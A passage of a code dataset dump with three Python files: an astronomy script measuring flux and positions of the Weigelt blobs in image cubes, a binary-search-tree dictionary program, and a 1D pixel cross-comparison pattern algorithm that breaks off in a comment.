ystart, xend, yend\n\n # print(j,(xstart,ystart), (xend,yend))\n\n profile = measure.profile_line(actual_image, (xstart,ystart), (xend,yend), linewidth=lineWidth)\n xvar = np.linspace(0,rho,profile.shape[0])\n\n dic[\"profile\"].append(profile)\n dic[\"radPos\"].append(xvar)\n\n return dic\n\n\n# measure the centroid of a defined region (for now, a box)\ndef position(data, coords_row, coords_col):\n\n import numpy as np\n import w_subimg\n import copy\n from skimage import measure\n from skimage import feature\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # http://www.python-course.eu/passing_arguments.php\n # https://jeffknupp.com/blog/2012/11/13/is-python-callbyvalue-or-callbyreference-neither/\n dic = copy.deepcopy(data) # <- THIS IS VERY IMPORTANT! KEEP copy.deepcopy()!\n dic['coords'] = [] # new key: centroid coordinates (x,y)\n dic['dist'] = [] # new key: centroid position\n dic['pa'] = [] # new key: position angle E from N\n\n raw_images = [\n data['fileName'],\n data['image'],\n data['pixScale']\n ]\n\n for j in range(ntrans):\n\n for i in range(nepoch):\n\n index = i + j * nepoch\n\n # print(j, i, index, raw_images[0][index], coords_row, coords_col)\n\n if raw_images[0][index] == 'zero.fits':\n raw_images[1][index] = raw_images[1][index] * 0\n\n # call the sub-image function\n subimg = w_subimg.main(raw_images[1][index],\n raw_images[2][index],\n coords_row[0], coords_col[0],\n coords_row[1], coords_col[1])\n\n subim_r, extent = subimg[0:2]\n row1, row2, col1, col2 = subimg[2:]\n\n # extracting the subimage\n img = subim_r.astype('double')\n\n mom = measure.moments(img)\n '''\n The following properties can be calculated from raw image moments:\n Area as: m[0, 0].\n Centroid as: {m[0, 1] / m[0, 0], m[1, 0] / m[0, 0]}.\n '''\n centroid = [mom[0,1] / mom[0,0], mom[1,0] / mom[0,0]]\n # centroid2 = get_centroid(img)\n # center of img\n center = (((raw_images[1][index]).shape)[0] - 1) / 2\n cent_col = (center - (col1+centroid[1])) * raw_images[2][index]\n cent_row = (row1+centroid[0] - center) * raw_images[2][index]\n\n # position angle measured E from N\n dist = np.sqrt(cent_col**2 + cent_row**2)\n pa = (2. 
* np.pi - np.arctan(cent_col/cent_row)) / np.pi * 180.\n\n dic[\"dist\"].append(dist)\n dic[\"coords\"].append([cent_row,cent_col])\n dic[\"pa\"].append(pa)\n\n return dic\n\n\n# measure the flux inside a defined region (for now, a box)\ndef flux(data, coords_row, coords_col):\n\n import numpy as np\n import w_subimg\n import copy\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # http://www.python-course.eu/passing_arguments.php\n # https://jeffknupp.com/blog/2012/11/13/is-python-callbyvalue-or-callbyreference-neither/\n dic = copy.deepcopy(data) # <- THIS IS VERY IMPORTANT! KEEP copy.deepcopy()!\n dic['flux'] = [] # new key\n\n raw_images = [\n data['fileName'],\n data['image'],\n data['pixScale']\n ]\n\n for j in range(ntrans):\n\n for i in range(nepoch):\n\n index = i + j * nepoch\n\n # print(j, i, index, raw_images[0][index], coords_row, coords_col)\n\n if raw_images[0][index] == 'zero.fits':\n raw_images[1][index] = raw_images[1][index] * 0\n\n # call the sub-image function\n subimg = w_subimg.main(raw_images[1][index],\n raw_images[2][index],\n coords_row[0], coords_col[0],\n coords_row[1], coords_col[1])\n\n subim_r, extent = subimg[0:2]\n row1, row2, col1, col2 = subimg[2:]\n\n # extracting the subimage\n img = subim_r.astype('double')\n\n dic[\"flux\"].append(np.sum(img) * (raw_images[2][index] / 0.1)**2)\n\n # print(dic[\"flux\"][0])\n\n return dic\n\n\n\nif __name__ == \"__main__\":\n\n # THIS MODULE CAN BE CALLED IN TWO WAYS:\n # (1) ./herMeasure.py (in which case the code will run with the defaul parameters listed below)\n # (2) from another script by providing the following arguments:\n #\n # --- from here\n #\n\n import numpy as np\n import copy\n import herData, herMeasure\n\n dataDir = '/Volumes/Kerberos/DATA/ETC/her/TEDS_CUBE/NEW/'\n dataList = dataDir + 'data_list.json'\n velMin, velMax = -60, -20\n data = herData.read(dataDir, dataList, velMin, velMax)\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # defining the corners of the area comprising the blobs\n # Weigelt C\n coord1_r_WC, coord2_r_WC = -0.2, +0.3 # -1, +1\n coord1_c_WC, coord2_c_WC = -0.5, -0.1 # -1, +1\n # Weigelt D\n coord1_r_WD, coord2_r_WD = -0.2, -0.8 # -1, +1\n coord1_c_WD, coord2_c_WD = -0.2, +0.3 # -1, +1\n # concatenating\n coords_r_WC = [coord1_r_WC, coord2_r_WC]\n coords_c_WC = [coord1_c_WC, coord2_c_WC]\n coords_r_WD = [coord1_r_WD, coord2_r_WD]\n coords_c_WD = [coord1_c_WD, coord2_c_WD]\n\n flux_WC = herMeasure.flux(data, coords_r_WC, coords_c_WC)\n flux_WD = herMeasure.flux(data, coords_r_WD, coords_c_WD)\n\n pos_WC = herMeasure.position(data, coords_r_WC, coords_c_WC)\n pos_WD = herMeasure.position(data, coords_r_WD, coords_c_WD)\n\n\n # plot the result with something like this:\n # he1_WC = herData.get(flux_WC, key='lineID', value='he1')\n # he1_WC_flux = [he1_WC[i]['flux'] for i in range(nepoch)]\n # he1_WD = herData.get(flux_WD, key='lineID', value='he1')\n # he1_WD_flux = [he1_WD[i]['flux'] for i in range(nepoch)]\n # x = [he1_WC[i]['Phi'] for i in range(nepoch)] or x = np.unique(he1_WC['Phi'])\n # plt.plot(x, he1_WC_flux)\n # plt.plot(x, he1_WD_flux)\n\n ### --- up to here\n\n\n\n ### BELOW IS THE GRAPHIC PART\n\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n from matplotlib.ticker import MaxNLocator\n from mairan_fix_bbox.fix_bbox import fix_bbox\n\n # FLUX\n leg_fontsize = 10\n epoch = Phi\n\n lineID = [u'ar3', u'he1', u'fe3', u'n2', 
u'fe2', u'ni2']\n line = [u'[Ar\\,{\\sc iii}]~$\\lambda7137$', u'He\\,{\\sc i}~$\\lambda4714$',\n u'[Fe\\,{\\sc iii}]~$\\lambda4659$', u'[N\\,{\\sc ii}]~$\\lambda5756$',\n u'[Fe\\,{\\sc ii}]~$\\lambda4815$', u'[Ni\\,{\\sc ii}]~$\\lambda7413$']\n\n markers = ['D', 'o']\n colors = ['k', 'r']\n\n legentTextID = ['Weigelt C', 'Weigelt D']\n\n # X and Y for plotting\n ionData_flux1 = np.empty((len(lineID), nepoch))\n ionData_flux2 = np.empty((len(lineID), nepoch))\n varx = np.unique(data['Phi'])\n\n for i in range(len(lineID)):\n # the order of the list entries is defined by the order in var 'lineID' above\n ionData1 = herData.get(flux_WC, key='lineID', value=lineID[i]) # retrieving the data for the ion\n ionData_flux1[i,:] = [ionData1[x]['flux'] for x in range(nepoch)] # storing the flux for each epoch\n\n ionData2 = herData.get(flux_WD, key='lineID', value=lineID[i]) # retrieving the data for the ion\n ionData_flux2[i,:] = [ionData2[x]['flux'] for x in range(nepoch)] # storing the flux for each epoch\n\n\n\n f, axarr = plt.subplots(3, 2, figsize=(10,7), sharex=True, sharey=True)\n\n for i in range(len(axarr)):\n\n nonZero1 = ionData_flux1[2*i] > 0\n nonZero2 = ionData_flux2[2*i+1] > 0\n\n # left column\n axarr[i,0].plot(varx[nonZero1], np.log10(ionData_flux1[2*i][nonZero1]), color=colors[0], marker=markers[0])\n axarr[i,0].plot(varx[nonZero1], np.log10(ionData_flux2[2*i][nonZero1]), color=colors[1], marker=markers[1])\n # right column\n axarr[i,1].plot(varx[nonZero2], np.log10(ionData_flux1[2*i+1][nonZero2]), color=colors[0], marker=markers[0])\n axarr[i,1].plot(varx[nonZero2], np.log10(ionData_flux2[2*i+1][nonZero2]), color=colors[1], marker=markers[1])\n\n # ionData1 = herData.get(flux_WC, key='lineID', value=lineID[])\n # axarr2 = axarr.flatten()\n # axarr2_pos_indx = [0,1,4,5,8,9,2,3,6,7,10,11] # <- what's this?\n # counter = 0\n # for k in range(2):\n #\n # for i in range(ntrans):\n #\n # axarr2[axarr2_pos_indx[counter]].xaxis.set_major_locator(MaxNLocator(4))\n # axarr2[axarr2_pos_indx[counter]].yaxis.set_major_locator(MaxNLocator(4))\n #\n # for j in range(2):\n #\n # if k == 0:\n # # flux\n # flux = flux_array[i*nepoch:(i+1)*nepoch,j]\n # # print(flux[flux>0])\n # axarr2[axarr2_pos_indx[counter]].set_ylim(np.log10(1e-13),np.log10(1e-10))\n # # print(np.min(flux[flux>0]),np.max(flux[flux>0]))\n # axarr2[axarr2_pos_indx[counter]].set_title(line[i])\n # # axarr2[axarr2_pos_indx[counter]].xaxis.set_major_locator(MaxNLocator(4))\n # # axarr2[axarr2_pos_indx[counter]].yaxis.set_major_locator(MaxNLocator(4))\n # axarr2[axarr2_pos_indx[counter]].plot(epoch[flux>0], np.log10(flux[flux>0]),\n # label='{}'.format(legentTextID[j]),\n # linestyle='None',\n # marker=markers[j],\n # color=colors[j])\n # else:\n # # flux normalized at apastron\n # flux = flux_array[i*nepoch:(i+1)*nepoch,j] / flux_array[i*nepoch+3,j] # <-- ERROR HERE\n # axarr2[axarr2_pos_indx[counter]].set_ylim(0.0,1.5)\n # axarr2[axarr2_pos_indx[counter]].set_title(line[i])\n # # axarr2[axarr2_pos_indx[counter]].xaxis.set_major_locator(MaxNLocator(4))\n # # axarr2[axarr2_pos_indx[counter]].yaxis.set_major_locator(MaxNLocator(3))\n # axarr2[axarr2_pos_indx[counter]].plot(epoch[flux>0], flux[flux>0],\n # label='{}'.format(legentTextID[j]),\n # linestyle='None',\n # marker=markers[j],\n # color=colors[j])\n #\n # axarr2[axarr2_pos_indx[counter]].axvline(x=13, color='0.5', ls='--', marker=' ', zorder=0, lw=1)\n #\n # if k == 0 and i == 1:\n # handles, labels = axarr2[axarr2_pos_indx[counter]].get_legend_handles_labels()\n # 
axarr2[axarr2_pos_indx[counter]].legend(handles, labels, loc='best', ncol=1, numpoints=1, frameon=True, fontsize=leg_fontsize)\n    #\n    #     counter+=1\n\n    plt.savefig('panel_flux2.eps')\n    fix_bbox('panel_flux2.eps')\n    plt.close(f)\n","sub_path":"herMeasure.py","file_name":"herMeasure.py","file_ext":"py","file_size_in_byte":13360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"521431612","text":"import pickle\r\nimport random\r\nimport os\r\n\r\ndef make_askii(word):\r\n    # concatenate the character codes of each letter, e.g. 'ab' -> 9798\r\n    res = ''\r\n    for l in word:\r\n        res += str(ord(l))\r\n    return int(res)\r\n\r\nclass Node(object):\r\n\r\n    def __init__(self, data, mean):\r\n        self.word = data\r\n        self.left = self.right = None\r\n        self.data = make_askii(data)\r\n        self.mean = mean\r\n\r\nclass BinarySearchTree(object):\r\n\r\n    def __init__(self):\r\n\r\n        self.root = None\r\n\r\n    def insert(self, data, mean):\r\n        self.root = self._insert_value(self.root, data, mean)\r\n        return 'inserted'\r\n\r\n    def _insert_value(self, node, data, mean):\r\n        if node is None:\r\n            node = Node(data, mean)\r\n        else:\r\n            if make_askii(data) <= node.data:\r\n                node.left = self._insert_value(node.left, data, mean)\r\n            else:\r\n                node.right = self._insert_value(node.right, data, mean)\r\n        return node\r\n\r\n    def find(self, key):\r\n        return self._find_value(self.root, make_askii(key))\r\n\r\n    def _find_value(self, root, key):\r\n        if root is None:\r\n            return 'is not in dictionary.'  # reached a leaf without a match\r\n        if root.data == key:\r\n            return root.mean\r\n        elif key < root.data:\r\n            return self._find_value(root.left, key)\r\n        else:\r\n            return self._find_value(root.right, key)\r\n\r\n    def delete(self, key):\r\n        self.root, deleted = self._delete_value(self.root, make_askii(key))\r\n        if deleted:\r\n            return 'deleted'\r\n        else:\r\n            return 'word is not in dictionary'\r\n\r\n    def _delete_value(self, node, key):\r\n        if node is None:\r\n            return node, False\r\n        deleted = False\r\n        if key == node.data:\r\n            deleted = True\r\n            if node.left and node.right:\r\n                parent, child = node, node.right\r\n                while child.left is not None:\r\n                    parent, child = child, child.left\r\n                child.left = node.left\r\n                if parent != node:\r\n                    parent.left = child.right\r\n                    child.right = node.right\r\n                node = child\r\n            elif node.left or node.right:\r\n                node = node.left or node.right\r\n            else:\r\n                node = None\r\n        elif key < node.data:\r\n            node.left, deleted = self._delete_value(node.left, key)\r\n        else:\r\n            node.right, deleted = self._delete_value(node.right, key)\r\n        return node, deleted\r\n\r\n    def pre_order_traversal(self):\r\n        def _pre_order_traversal(root):\r\n            if root is None:\r\n                pass\r\n            else:\r\n                print(root.word + ':', root.mean)\r\n\r\n                _pre_order_traversal(root.left)\r\n                _pre_order_traversal(root.right)\r\n        _pre_order_traversal(self.root)\r\n\r\n    def in_order_traversal(self):\r\n        def _in_order_traversal(root):\r\n            if root is None:\r\n                pass\r\n            else:\r\n                _in_order_traversal(root.left)\r\n                print(root.word + ':', root.mean)\r\n\r\n                _in_order_traversal(root.right)\r\n\r\n        _in_order_traversal(self.root)\r\n\r\n    def post_order_traversal(self):\r\n        def _post_order_traversal(root):\r\n            if root is None:\r\n                pass\r\n            else:\r\n                _post_order_traversal(root.left)\r\n                _post_order_traversal(root.right)\r\n                print(root.word + ':', root.mean)\r\n\r\n        _post_order_traversal(self.root)\r\n\r\n
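    # Level-order traversal is a breadth-first walk: nodes are popped from the\r\n    # front of a FIFO queue and their children appended at the back, so words\r\n    # print one tree depth at a time.\r\n    def level_order_traversal(self):\r\n        def _level_order_traversal(root):\r\n            queue = [root]\r\n            while queue:\r\n                root = queue.pop(0)\r\n                if root is not None:\r\n                    print(root.word+':', root.mean)\r\n                    if 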
root.left:\r\n queue.append(root.left)\r\n if root.right:\r\n queue.append(root.right)\r\n _level_order_traversal(self.root)\r\n\r\ndef insert_data():\r\n\r\n def read_file(filename):\r\n words = []\r\n f = open(filename, 'r')\r\n while True:\r\n line = f.readline()\r\n if not line:\r\n break\r\n line = line.split()\r\n words.append((line[0], ' '.join(line[1:])))\r\n f.close()\r\n random.shuffle(words)\r\n return words\r\n\r\n Dictionary = BinarySearchTree()\r\n words = read_file(\"words.txt\")\r\n\r\n for word, mean in words:\r\n Dictionary.insert(word, mean)\r\n\r\n with open('data.pickle', 'wb') as f:\r\n pickle.dump(Dictionary, f, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef cls():\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n\r\ndef mainloop():\r\n\r\n insert_data()\r\n with open('data.pickle', 'rb') as f:\r\n data = pickle.load(f)\r\n\r\n while True:\r\n a = input()\r\n if a.split()[0] == 'find':\r\n cls()\r\n print(a[5:] + ':', data.find(a[5:]))\r\n\r\n elif a.split()[0] == 'delete':\r\n cls()\r\n try:\r\n print(a[7:], data.delete(a[7:]))\r\n except:\r\n print('try again')\r\n\r\n elif a.split()[0] == 'insert':\r\n cls()\r\n try:\r\n print(a.split()[1], data.insert(a.split()[1], ' '.join(a.split()[2:])))\r\n except:\r\n print('try again')\r\n\r\n elif a == 'pre order traversal':\r\n cls()\r\n data.pre_order_traversal()\r\n\r\n elif a == 'in order traversal':\r\n cls()\r\n data.in_order_traversal()\r\n\r\n elif a == 'post order traversal':\r\n cls()\r\n data.post_order_traversal()\r\n\r\n elif a == 'level order traversal':\r\n cls()\r\n data.level_order_traversal()\r\n\r\n elif a == 'quit':\r\n cls()\r\n print('quit dictionary.')\r\n exit()\r\n\r\n elif a == 'save':\r\n with open('data.pickle', 'wb') as f:\r\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)\r\n cls()\r\n print('save')\r\n\r\n else:\r\n cls()\r\n print('wrong command.\\n '\r\n 'find [word]: finding word\\n '\r\n 'delete [word]: deleting word\\n '\r\n 'insert [word] [meaning]: inserting word\\n '\r\n 'pre order traversal\\n '\r\n 'in order traversal\\n '\r\n 'post order traversal\\n '\r\n 'level order traversal\\n '\r\n 'quit: quit dictionary')\r\n\r\nif __name__ == '__main__':\r\n mainloop()","sub_path":"Dictionary/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"394395944","text":"import cv2\nimport argparse\nfrom time import time\nfrom line_1D_alg.utils import *\nfrom itertools import zip_longest\n\n'''\n line_patterns is a principal version of 1st-level 1D algorithm, contains operations:\n\n- Cross-compare consecutive pixels within each row of image, forming dert_ queue of derts: tuples of derivatives per pixel.\n dert_ is then segmented into patterns mPs and dPs: contiguous sequences of pixels forming same-sign match or difference.\n Initial match is inverse deviation of variation: m = ave_|d| - |d|, rather than minimum for directly defined match:\n albedo or intensity of reflected light doesn't correlate with predictive value of the object that reflects it.\n\n- Match patterns mPs are spans of inputs forming same-sign match. Positive mPs contain high-match pixels, which are likely\n to match more distant pixels. Thus, positive mPs are evaluated for cross-comp of pixels over incremented range.\n- Difference patterns dPs are spans of inputs forming same-sign ds. 
d sign match is a precondition for d match, so only\n    same-sign spans (dPs) are evaluated for cross-comp of constituent differences, which forms higher derivatives.\n    (d match = min: rng+ comp value: predictive value of difference is proportional to its magnitude, although inversely so)\n\n    Both extended cross-comp forks are recursive: resulting sub-patterns are evaluated for deeper cross-comp, same as top patterns.\n    Both forks currently process all inputs (full overlap), but they can be exclusive or partly overlapping to reduce redundancy.\n\n    Initial bi-lateral cross-comp here is 1D slice of 2D 3x3 kernel, while uni-lateral d is equivalent to 2x2 kernel.\n    Odd kernels preserve resolution of pixels, while 2x2 kernels preserve resolution of derivatives, in resulting derts.\n    The former should be used in rng_comp and the latter in der_comp, which may alternate with intra_P.\n\n    postfix '_' denotes array name, vs. same-name elements\n    prefix '_' denotes prior of two same-name variables\n    prefix 'f' denotes binary flag\n    '''\n# pattern filters or hyper-parameters: eventually from higher-level feedback, initialized here as constants:\n\nave = 15  # |difference| between pixels that coincides with average value of mP - redundancy to overlapping dPs\nave_min = 2  # for m defined as min |d|: smaller?\nave_M = 50  # min M for initial incremental-range comparison(t_), higher cost than der_comp?\nave_D = 5  # min |D| for initial incremental-derivation comparison(d_)\nave_nP = 5  # average number of sub_Ps in P, to estimate intra-costs? ave_rdn_inc = 1 + 1 / ave_nP  # 1.2\nave_rdd = .5  # average dd / d, for projection: uni_d *= 1.5?\nini_y = 500\n\n\ndef cross_comp(frame_of_pixels_):  # converts frame_of_pixels to frame_of_patterns, each pattern may be nested\n\n    Y, X = frame_of_pixels_.shape  # Y: frame height, X: frame width (use the parameter, not the global image)\n    frame_of_patterns_ = []\n\n    for y in range(ini_y + 1, Y):  # y is index of new line pixel_, initialization:\n        pixel_ = frame_of_pixels_[y, :]\n        dert_ = []\n        __p, _p = pixel_[0:2]  # each prefix '_' denotes prior\n        _d = _p - __p  # initial comp\n        _m = ave - abs(_d)\n        dert_.append((__p, _d * 1.5, _m * 1.5, None))  # back-project _d and _m to bilateral values\n\n        for p in pixel_[2:]:  # pixel p is compared to prior pixel _p in a row\n            d = p - _p\n            m = ave - abs(d)  # initial match is inverse deviation of |difference|\n            dert_.append((_p, d + _d, m + _m, _d))  # pack dert: prior p, bilateral difference and match, prior d\n            _p, _d, _m = p, d, m\n        dert_.append((_p, _d * 1.5, _m * 1.5, _d))  # or unilateral d only? forward-project last d and m to bilateral values\n\n        dP_ = form_P_(dert_, fdP=True)  # forms d-sign patterns\n        intra_P(dP_, fdP=True, fid=True, rdn=1, rng=2)  # evaluates sub-recursion per dP\n        mP_ = form_P_(dert_, fdP=False)  # forms m-sign patterns\n        intra_P(mP_, fdP=False, fid=False, rdn=1, rng=3)  # evaluates sub-recursion per mP\n\n        frame_of_patterns_ += [(dP_, mP_)]  # line of patterns is added to frame of patterns\n    return frame_of_patterns_  # frame of patterns will be output to level 2\n
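\n\n# Worked example with hypothetical numbers: given ave = 15 and a pixel row\n# starting 10, 12, 15, the first comp yields d = 12 - 10 = 2 and\n# m = 15 - |2| = 13; the next comp yields d = 3, m = 12. All m > 0, so these\n# derts would cluster into a positive mP (high-match span), not a dP.\n\n\ndef form_P_(P_dert_, fdP):  # pattern initialization, accumulation, termination, parallel der+ and rng+?\n\n    P_ = []  # initialization:\n    if fdP:  # flag dP, selects between form_dP_ and form_mP_ forks, criterion is uni_d vs. 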
m\n p, d, m, uni_d = P_dert_[1] # skip dert_[0]: _uni_d belong to prior dP\n _sign = uni_d > 0\n ini_dert = 2\n else:\n p, d, m, uni_d = P_dert_[0]\n _sign = m > 0\n ini_dert = 1\n dLL, rLL, L, I, D, M, dert_, dsub_, rsub_ = [], [], 1, p, 0, m, [(p, d, m, uni_d)], [], []\n # LL: depth of sub-hierarchy, each sub-pattern in sub_ is nested to depth = sub_[n], 1st uni_d is skipped\n\n for p, d, m, uni_d in P_dert_[ini_dert:]: # cluster P_derts by m | uni_d sign\n if fdP:\n sign = uni_d > 0\n else:\n sign = m > 0\n if sign != _sign: # sign change: terminate P\n P_.append((_sign, dLL, rLL, L, I, D, M, dert_, dsub_, rsub_))\n dLL, rLL, L, I, D, M, dert_, dsub_, rsub_ = [], [], 0, 0, 0, 0, [], [], []\n # reset accumulated params\n L += 1;\n I += p;\n D += uni_d;\n M += m # accumulate params, bilateral m: for eval per pixel\n dert_ += [(p, d, m, uni_d)]\n _sign = sign\n\n P_.append((_sign, dLL, rLL, L, I, D, M, dert_, dsub_, rsub_)) # incomplete P\n # also sum Dert per P_?\n return P_\n\n\n''' Recursion in intra_P extends pattern with sub_: hierarchy of sub-patterns, to be adjusted by macro-feedback:\n P_:\n fdP, # flag: select dP or mP forks in form_P_ and intra_P\n fid, # flag: input is derived: magnitude correlates with predictive value: m = min-ave, else m = ave-|d|\n rdn, # redundancy to higher layers, possibly lateral overlap of rng+ & der+, rdn += 1 * typ coef?\n rng, # comparison range\n P:\n sign, # of core param: m | d\n Dert = L, I, D, M,\n dert_, # input for extended comp\n dsub_, # multiple layers of (hyper, Dert, sub_P_) from segment or extended comp, nested to depth = sub_[n],\n rsub_, # for layer-parallel access and comp, similar to frequency domain representation\n # sub_P_: flat or nested for mapping to higher-layer sub_P_ element?\n root # reference to higher P for layer-sequential feedback\n\n orders of composition: 1st: dert_, 2nd: lateral_sub_( derts), 3rd: sub_( lateral_sub_( derts))?\n line-wide layer-sequential recursion and feedback, for clarity and slice-mapped SIMD processing?\n'''\n\n\ndef intra_P(P_, fdP, fid, rdn, rng): # evaluate for sub-recursion in line P_, filling its sub_P_ with the results\n\n deep_sub_ = [] # intra_P recursion extends rsub_ and dsub_ hierarchies by sub_P_ layer\n ext_dert_ = [] # new dert_ from extended- range or derivation comp\n\n for sign, dLL, rLL, L, I, D, M, dert_, dsub_, rsub_ in P_: # each sub in sub_ is nested to depth = sub_[n]\n\n if fdP: # P = dP: d sign match is partial d match, precondition for der+, or in -mPs to avoid overlap\n if abs(D) > ave_D * rdn and L > 3: # cross-comp uni_ds at rng+1:\n ext_dert_ = der_comp(dert_)\n else:\n ext_dert_ = []\n elif sign: # P = +mP: low-variation span, eval comp at rng*3 (2+1): 1, 3, 9, kernel: 3, 7, 19\n if M > ave_M * rdn and L > 4: # skip comp predictable next dert:\n ext_dert_ = rng_comp(dert_, fid)\n else:\n ext_dert_ = [] # also merge not-selected P into non_P?\n if ext_dert_:\n sub_dP_ = form_P_(ext_dert_, True);\n lL = len(sub_dP_)\n dsub_ += [[(lL, True, True, rdn, rng, sub_dP_)]] # 1st layer: lL, fdP, fid, rdn, rng, sub_P_\n dsub_ += intra_P(sub_dP_, True, True, rdn + 1 + 1 / lL, rng + 1) # deep layers feedback\n dLL[:] = [len(dsub_)] # deeper P rdn + 1: rdn to higher derts, + 1 / lL: rdn to higher sub_\n\n sub_mP_ = form_P_(ext_dert_, False);\n lL = len(sub_mP_)\n rsub_ += [[(lL, False, fid, rdn, rng, sub_mP_)]] # 1st layer, Dert=[], fill if lL > min?\n rsub_ += intra_P(sub_mP_, False, fid, rdn + 1 + 1 / lL, rng * 2 + 1) # deep layers feedback\n rLL[:] = [len(rsub_)]\n\n deep_sub_ 
= [deep_sub + dsub + rsub for deep_sub, dsub, rsub in zip_longest(deep_sub_, dsub_, rsub_, fillvalue=[])]\n # deep_rsub_ and deep_dsub_ are spliced into deep_sub_ hierarchy\n # fill layer Dert if n_sub_P > min\n return deep_sub_\n\n\ndef rng_comp(dert_, fid): # skip odd derts for sparse rng+ comp: 1 skip / 1 add, to maintain 2x overlap\n\n rdert_ = [] # prefix '_' denotes the prior of same-name variables, initialization:\n (__i, __short_bi_d, __short_bi_m, _), _, (_i, _short_bi_d, _short_bi_m, _) = dert_[0:3]\n _d = _i - __i\n if fid:\n _m = min(__i, _i) - ave_min;\n else:\n _m = ave - abs(_d) # no ave * rng: actual m and d value is cumulative?\n _bi_d = _d * 1.5 + __short_bi_d\n _bi_m = _m * 1.5 + __short_bi_m # back-project _m and d\n rdert_.append((__i, _bi_d, _bi_m, None))\n\n for n in range(4, len(dert_), 2): # backward comp, ave | cumulative ders and filters?\n i, short_bi_d, short_bi_m = dert_[n][:3] # shorter-rng dert\n d = i - _i\n if fid:\n m = min(i, _i) - ave_min # match = min: magnitude of derived vars correlates with stability\n else:\n m = ave - abs(d) # inverse match: intensity doesn't correlate with stability\n bi_d = _d + d + _short_bi_d # bilateral difference, accum in rng\n bi_m = _m + m + _short_bi_m # bilateral match, accum in rng\n rdert_.append((_i, bi_d, bi_m, _d))\n _i, _d, _m, _short_bi_d, _short_bi_m = i, d, m, short_bi_d, short_bi_m\n\n rdert_.append((_i, _d * 1.5 + _short_bi_d, _m * 1.5 + _short_bi_m, _d))\n # forward-project unilateral to bilateral d and m values\n return rdert_\n\n\ndef der_comp(dert_): # cross-comp consecutive uni_ds in same-sign dert_: sign match is partial d match\n # dd and md may match across d sign, but likely in high-match area, spliced by spec in comp_P?\n\n ddert_ = [] # initialization:\n (_, _, _, __i), (_, _, _, _i) = dert_[1:3] # each prefix '_' denotes prior\n __i = abs(__i);\n _i = abs(_i)\n _d = _i - __i # initial comp\n _m = min(__i, _i) - ave_min\n ddert_.append((__i, _d * 1.5, _m * 1.5, None)) # __d and __m are back-projected as = _d or _m\n\n for dert in dert_[3:]:\n i = abs(dert[3]) # unilateral d in same-d-sign seg, no sign comp\n d = i - _i # d is dd\n m = min(i, _i) - ave_min # md = min: magnitude of derived vars corresponds to predictive value\n bi_d = _d + d # bilateral d-difference per _i\n bi_m = _m + m # bilateral d-match per _i\n ddert_.append((_i, bi_d, bi_m, _d))\n _i, _d, _m = i, d, m\n\n ddert_.append((_i, _d * 1.5, _m * 1.5, _d)) # forward-project unilateral to bilateral d and m values\n return ddert_\n\n\nif __name__ == \"__main__\":\n # Parse argument (image)\n argument_parser = argparse.ArgumentParser()\n argument_parser.add_argument('-i', '--image',\n help='path to image file',\n default='.//raccoon.jpg')\n arguments = vars(argument_parser.parse_args())\n # Read image\n image = cv2.imread(arguments['image'], 0).astype(int) # load pix-mapped image\n assert image is not None, \"Couldn't find image in the path!\"\n image = image.astype(int)\n # same image loaded online, without cv2:\n # from scipy import misc\n # image = misc.face(gray=True).astype(int)\n\n start_time = time()\n # Main\n frame_of_patterns_ = cross_comp(image)\n end_time = time() - start_time\n print(end_time)\n\n'''\n2nd level cross-compares resulting patterns Ps (s, L, I, D, M, r, nested e_) and evaluates them for deeper cross-comparison.\nDepth of cross-comparison (discontinuous if generic) is increased in lower-recursion e_, then between same-recursion e_s:\n\ncomp (s)? # same-sign only\n comp (L, I, D, M)? 
# in parallel or L first, equal-weight or I is redundant?\n cross_comp (sub_)? # same-recursion (derivation) order e_\n cross_comp (dert_)\n\nThen extend this 2nd level alg to a recursive meta-level algorithm\n\nfor partial overlap:\n\ndef form_mP_(dert_): # initialization, accumulation, termination\n\n _sign, LL, L, I, D, M, dert_, sub_ = P # each sub in sub_ is nested to depth = sub_[n]\n p, d, m, uni_d = dert\n sign = m > 0\n if sign != _sign:\n # sign change: terminate P\n P_.append((_sign, LL, L, I, D, M, dert_, sub_)) # LL(sub_ depth), L (len dert_) for visibility only\n LL, L, I, D, M, dert_, sub_ = [], 0, 0, 0, 0, [], [] # reset accumulated params\n # accumulate params with bilateral values:\n L += 1; I += p; D += d; M += m\n dert_ += [(p, d, m, uni_d)] # uni_d for der_comp and segment\n P = sign, LL, L, I, D, M, dert_, sub_ # sub_ is accumulated in intra_P\n\n return P, P_\n\ndef form_dP_(dert_): # P segmentation by same d sign: initialization, accumulation, termination\n\n sub_ = [] # becomes lateral_sub_\n _p, _d, _m, _uni_d = dert_[0] # prefix '_' denotes prior\n try:\n _sign = _uni_d > 0; ini = 1\n except:\n _p, _d, _m, _uni_d = dert_[1] # skip dert_[0] if uni_d is None: 1st dert in comp sequence\n _sign = _uni_d > 0; ini = 2\n\n if _uni_d > min_d: md_sign = 1 # > variable cost of der+\n else: md_sign = 0 # no der+ eval\n\n LL, L, I, D, M, seg_dert_ = [], 1, _p, _uni_d, _m, [(_p, _d, _m, _uni_d)] # initialize dP\n\n for p, d, m, uni_d in dert_[ini:]:\n sign = uni_d > 0\n if _sign != sign:\n sub_.append((_sign, LL, L, I, D, M, seg_dert_, [])) # terminate seg_P, same as P\n LL, L, I, D, M, seg_dert_, sub_ = [], 0, 0, 0, 0, [], [] # reset accumulated seg_P params\n _sign = sign\n L += 1; I += p; D += uni_d; M += m # D += uni_d to eval for comp uni_d\n seg_dert_.append((p, d, m, uni_d))\n\n sub_.append((_sign, LL, L, I, D, M, seg_dert_, [])) # pack last segment, nothing to accumulate\n # also Dert in sub_ [], fill if min lLL?\n return sub_ # becomes lateral_sub_\n\ndef splice(listOfLists, *otherLoLs, fillvalue=[]):\n \"Splice nested lists laterally.\"\n return [[*flatten(li)] for li in zip_longest(listOfLists, *otherLoLs, fillvalue=fillvalue)]\n\n 